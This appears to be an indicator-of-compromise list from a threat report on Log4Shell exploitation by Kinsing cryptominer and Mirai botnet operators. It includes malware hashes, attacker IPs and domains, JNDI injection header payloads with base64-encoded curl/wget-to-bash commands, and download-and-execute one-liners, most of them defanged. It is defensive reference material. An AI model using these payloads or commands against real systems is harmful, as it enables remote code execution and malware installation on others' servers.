Hashes SHA1 1d1866b00f948c103a9076b39061bde5c1f68350 - Backdoor.Linux.MIRAI.SEMR 8dcfce4dcfbead344c15dfc4b3a4395dd0f9750f - Trojan.SH.KINSING.H 284a97cab405a28732035186a0c6306a692d4480 - Trojan.SH.KINSING.I 0194637f1e83c2efc8bcda8d20c446805698c7bc - Coinminer.Linux.KINSING.D ----------------------------------------------------------------------- HTTP Headers $%7Bjndi%3Aldaps%3A//0384eb5a.probe001.log4j[.]leakix.net%3A1266/b%7D $%7Bjndi:ldaps://029e7c6c.probe001.log4j[.]leakix.net:1266/b%7D ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback} ${jndi:ldap://015ed9119662[.]bingsearchlib[.]com:39356/a} ${jndi:ldap://32fce0c1f193[.]bingsearchlib[.]com:39356/a} ${jndi:ldap://3be6466b6a20[.]bingsearchlib[.]com:39356/a} ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MCl8YmFzaA==} ${jndi:ldap://45.155.205[.]233[:]12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK} ${jndi:ldap://4568-3409-8076-3389.service[.]exfil.site} ${jndi:ldap://6c8d7dd40593[.]bingsearchlib[.]com:39356/a} ${jndi:ldap://7faf976567f5[.]bingsearchlib[.]com:39356/a} ${jndi:ldap://80.71.158[.]12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=} ${jndi:ldap://e86eafcf9294[.]bingsearchlib[.]com:39356/a} ${jndi:ldap:/jjug8i.xaliyun[.]com/x} ?&token=${jndi:rmi://vyvdsvh.x.i.yunzhanghu[.]co:443/abc} 500.html?aspxerrorpath=/${jndi:ldap:/45[.]130.229.168:1389/Exploit} login?next=${jndi:dns://lnc7vvhztmjdfm221sdp76xnze5atz.burpcollaborator[.]net:443} ---------------------------------------------------------------------------------- IP Addresses 104.244.79[.]6 109.237.96[.]124 171.25.193[.]20 171.25.193[.]25 171.25.193[.]77 
171.25.193[.]78 178.17.171[.]102 18.27.197[.]252 185.100.87[.]202 185.220.100[.]242 185.220.101[.]146 185.220.101[.]39 213.164.204[.]146 45.155.205[.]233 89.234.182[.]139 -------------------------------------------------------- Kinsing Mining Activity Commands curl -o /tmp/kinsing hxxp[:]//80.71.158[.]12/kinsing curl -o /tmp/libsystem.so hxxp[:]//80.71.158[.]12/libsystem.so curl -o /etc/kinsing hxxp[:]//80.71.158[.]12/kinsing chmod 777 /tmp/kinsing chattr -R -i /var/spool/cron chmod +x /etc/kinsing URLs http[:]//45.137.155[.]55/ex[.]sh http[:]//45.137.155[.]55/kinsing http[:]//80.71.158[.]12/libsystem.so http[:]//80.71.158[.]12/kinsing http[:]//80.71.158[.]12/Exploit69ogQNSQYz.class Hashes SHA256 6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b 8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a Hashes SHA1 1d1866b00f948c103a9076b39061bde5c1f68350 8dcfce4dcfbead344c15dfc4b3a4395dd0f9750f 284a97cab405a28732035186a0c6306a692d4480 0194637f1e83c2efc8bcda8d20c446805698c7bc e851126ef41e3dc474238d3160f4b0e7e3bbb7ec -------------------------------------------------------------------------------- Mirai Infection Activity Mirai retrieval script (SHA256) 3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26 (lh[.]sh) Binary retrieval/execution commands wget hxxp[:]//62.210.130[.]250/web/admin/x86;chmod +x x86;./x86 x86; wget hxxp[:]//62.210.130[.]250/web/admin/x86_64;chmod +x x86_64;./x86_g x86_64; wget hxxp[:]//62.210.130[.]250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g; Mirai binary hashes (SHA256) 2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984 776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00 8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81 Mirai attacker IP address 62.210.130[.]250 ------------------------------------------------------------------------------ Additional Malware Payload Hashes SHA256 
0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049 19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d 2a4e636c4077b493868ea696db3be864126d1066cdc95131f522a4c9f5fb3fec 2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129 5c46098887e488d91f42c6d9b93b17b2736c9f4cb5a4a1e476c87c0d310a3f28 6370939d4ff51b934b7a2674ee7307ed06111ab3b896a8847d16107558f58e5b 63d43e5b292b806e857470e53412310ad7103432ba3390ecd4f74e432530a8a9 6a8965a0f897539cc06fefe65d1a4c5fa450d002d1a9d5d69d2b48f697ee5c05 715f1f821d028e165bfa750d73505f1a6136184999411300cc88c18ebfa6e8f7 776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00 8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81 a3f72a73e146834b43dab8833e0a9cfee6d08843a4c23fdf425295e53517afce b3a6fe5bc3883fd26c682bb6271a700b8a6fe006ad8df6c09cc87530fcd3a778 b55ddbaee7abf1c73570d6543dd108df0580b08f730de299579570c23b3078c0 c154d739cab62e958944bb4ac5ebad6e965a0442a3f1c1d99d56137e3efa8e40 c38f0f809a1d8c50aafc2f13185df1441345f83f6eb4ef9c48270b9bd90c6799 e20806791aeae93ec120e728f892a8850f624ce2052205ddb3f104bbbfae7f80 fe98548300025a46de1e06b94252af601a215b985dad31353596af3c1813efb0 ------------------------------------------------------------------------------- Observed Domains abrahackbugs[.]xyz cuminside[.]club m3[.]wtf pwn[.]af rce[.]ee x41[.]me